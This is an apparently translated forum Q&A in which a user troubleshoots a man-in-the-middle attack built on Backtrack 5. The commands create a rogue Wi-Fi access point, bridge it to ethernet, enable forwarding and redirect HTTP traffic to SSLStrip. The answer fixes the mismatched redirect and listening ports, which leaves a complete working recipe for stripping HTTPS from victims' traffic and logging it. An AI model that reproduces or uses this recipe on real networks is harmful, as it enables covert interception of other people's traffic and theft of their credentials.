SSLStrip 不适合我

【问题标题】:SSLStrip not working for meSSLStrip 不适合我
【发布时间】:2012-04-01 02:44:00
【问题描述】:

我在使用 Backtrack 5 的 MITM 设置中遇到 SSLStrip 问题。我正在使用外部无线网卡来广播无线信号,并通过以太网进行路由。我在 Wireshark 中成功查看了数据包,但是我想使用 SSLStrip 查看 SSL 数据。这些是我用来设置 MITM 的初步命令。

airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0

--新终端--

brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward

此时,我可以在 WireShark 中查看数据包数据。我按照这些步骤设置 SSLStrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080

当我完成会话并打开 sslstrip.log 时,我没有看到任何写入文件的数据。此外,一旦我执行 iptables 重定向,我将无法访问互联网。请让我知道您认为问题可能出在哪里。

【问题讨论】:

    标签: packet-sniffers packets


    【解决方案1】:

    假设 sslstrip 和 arp 中毒已启动并运行,您的端口重定向有问题。

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666

    将 http 流量重定向到 127.0.0.1 端口 666。

    cd /pentest/web/sslstrip
    sslstrip -l 8080

    启动 sslstrip 监听端口 8080 上的传入流量

    U 可以将端口重定向更改为 8080

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    或者将监听端口改为666

    sslstrip -l 666

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2011-08-11
      • 2011-01-05
      • 2011-12-23
      • 2011-05-02
      • 2012-12-07
      • 2012-05-04
      • 1970-01-01
      • 1970-01-01
      相关资源
      最近更新 更多
      热门标签
      Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode